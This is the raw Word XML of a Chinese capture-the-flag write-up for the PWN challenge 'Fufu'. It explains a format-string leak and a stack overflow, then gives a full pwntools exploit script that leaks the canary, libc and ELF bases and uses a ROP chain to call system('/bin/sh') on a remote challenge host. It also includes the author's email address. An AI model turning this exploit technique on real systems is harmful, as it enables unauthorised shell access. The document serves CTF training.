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2F45" w14:textId="77777777" w:rsidR="006C5F69" w:rsidRDefault="006C5F69" w:rsidP="006C5F6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QLNU-SEC-2403+于光泽+191897071@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7688D" w14:textId="335975D6" w:rsidR="006C5F69" w:rsidRPr="009E7644" w:rsidRDefault="00124342" w:rsidP="006C5F69">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>PWN</w:t>
      </w:r>
      <w:r w:rsidR="006C5F69" w:rsidRPr="009E7644">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="006C5F69" w:rsidRPr="006C5F69">
        <w:t xml:space="preserve"> Fufu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40648683" w14:textId="65E32C77" w:rsidR="006C5F69" w:rsidRDefault="006C5F69" w:rsidP="006C5F69">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3924B4D6" w14:textId="23C7BB2E" w:rsidR="006C5F69" w:rsidRDefault="006C5F69" w:rsidP="006C5F69">
      <w:pPr>
        <w:widowControl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ida中分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5F69">
        <w:t>submit_evidence函数中存在格式化字符串漏洞printf(nbytes_4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5F69">
        <w:t>libc，elf，canary。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511126F" w14:textId="23B02FC1" w:rsidR="009B21DE" w:rsidRDefault="006C5F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44CA5AFC" wp14:editId="3D94CB6E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DCA6" w14:textId="3C2273F9" w:rsidR="006C5F69" w:rsidRDefault="006C5F69">
      <w:r w:rsidRPr="006C5F69">
        <w:t>trial_adjourned函数存在栈溢出漏洞read(0, buf, 0x80uLL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1B46D" w14:textId="10C7DC78" w:rsidR="006C5F69" w:rsidRDefault="006C5F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3438ECBE" wp14:editId="6A0A2EBE">
            <wp:extent cx="5274310" cy="2291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63B" w14:textId="2959F672" w:rsidR="006C5F69" w:rsidRDefault="006C5F69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写脚本</w:t>
      </w:r>
      <w:r w:rsidR="00124342">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00124342" w:rsidRPr="00124342">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过格式化字符串漏洞泄露栈保护</w:t>
      </w:r>
      <w:r w:rsidR="00124342" w:rsidRPr="00124342">
        <w:t>libc 基址和程序基址，构造包含这些信息的溢出载荷，利用 ROP 链绕过保护机制并调用 system ("/bin/sh") 获取目标系统的 shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B2A57" w14:textId="7B50375F" w:rsidR="00124342" w:rsidRDefault="00124342">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43ABEE53" wp14:editId="37CC7BC9">
            <wp:extent cx="5274310" cy="270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2E0C" w14:textId="062817E7" w:rsidR="00124342" w:rsidRDefault="00124342">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00124342">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00124342">
        <w:t>ISCC{832ad2b3-051e-4407-b86f-9f478e02d806}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3798C3" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>xp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5426CF" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596177B0" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>context.terminal = ['tmux', 'splitw', '-h', '-p', '75']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B398663" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>context(arch='amd64', os='linux', log_level='info')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E54993" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342"/>
    <w:p w14:paraId="4F445C6D" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>TARGET_HOST = '101.200.155.151'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A9B24" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>TARGET_PORT = 12600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E69E1" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342"/>
    <w:p w14:paraId="4F70A040" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>def init_connection():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC083FA" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    return remote(TARGET_HOST, TARGET_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93E7A9" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>def retrieve_canary(conn):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B1012" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('choice? &gt;&gt; ', '1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A143591" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('limited! &gt;&gt; ', '6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457C9E7" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('evidence! &gt;&gt; ', '%17$p')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E96EAD" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.recvuntil('0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44478876" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    stack_canary = int(conn.recv(16), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074AF7C1" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.success(f"获取到Canary值: 0x{stack_canary:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F5544" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('chicken! &gt;&gt; ', 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01470DB7" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    return stack_canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE5CA33" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>def retrieve_libc_base(conn):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138ABA28" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('choice? &gt;&gt; ', '1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C145547" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('limited! &gt;&gt; ', '6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43186497" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('evidence! &gt;&gt; ', '%23$p')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D7C448" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.recvuntil('0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591C651" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    libc_leak = int(conn.recv(12), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4471C1D4" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    libc_start = libc_leak - 0x29d90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25C8E4" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.success(f"获取到Libc基址: 0x{libc_start:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398BBBA" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    conn.sendlineafter('chicken! &gt;&gt; ', 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566B3CD" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    return libc_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C8228" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>def retrieve_elf_base(conn):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA2BB3" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('choice? &gt;&gt; ', '1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B2C8B" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('limited! &gt;&gt; ', '6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008CB62" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('evidence! &gt;&gt; ', '%19$p')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F1DE1" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.recvuntil('0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA322D" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    elf_leak = int(conn.recv(12), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3F67D" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    elf_start = elf_leak - 0x13d6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3E2EB" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.success(f"获取到ELF基址: 0x{elf_start:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B50C1D" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('chicken! &gt;&gt; ', 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E9DF6" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    return elf_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EAFA7" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>def execute_exploit():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D453F81" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn = init_connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A22DA7" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    canary = retrieve_canary(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE27D3" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    libc_base = retrieve_libc_base(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AA06C" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    elf_base = retrieve_elf_base(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B90FC0" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    shell_func = libc_base + 0x50d70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469DFB49" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    shell_str = libc_base + 0x1d8678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE04C0" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    pop_rdi_gadget = elf_base + 0x132F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8FC6F" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    stack_align_gadget = elf_base + 0x101a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89217E" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.info(f"system函数地址: 0x{shell_func:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D69938" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.info(f"/bin/sh字符串地址: 0x{shell_str:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0C6E5" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.info(f"pop rdi; ret Gadget: 0x{pop_rdi_gadget:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B18F4" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    log.info(f"栈对齐Gadget: 0x{stack_align_gadget:x}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371939B5" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    payload = flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7B256" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        b'A' * 0x48,                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5111886C" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        canary,                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB88C1" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        0,                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA0EB5" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        stack_align_gadget,           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203113E" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        pop_rdi_gadget,               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9490C" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        shell_str,                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71341CCF" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">        shell_func                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77422E07" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ECB40F" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('choice? &gt;&gt; ', '2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4847B" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.sendlineafter('adjourned\n', payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351B4524" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t xml:space="preserve">    conn.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238437A" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342"/>
    <w:p w14:paraId="73819182" w14:textId="77777777" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B299E15" w14:textId="4CB82189" w:rsidR="00124342" w:rsidRDefault="00124342" w:rsidP="00124342">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    execute_exploit()    </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0012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55"/>
    <w:rsid w:val="00124342"/>
    <w:rsid w:val="006C5F69"/>
    <w:rsid w:val="009B21DE"/>
    <w:rsid w:val="00A34516"/>
    <w:rsid w:val="00F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CFF00"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{41FB6636-6FC3-4358-B46D-B7189B7C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5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5F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5F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2305</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>85</Lines>
  <Paragraphs>78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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-13T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-14T09:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>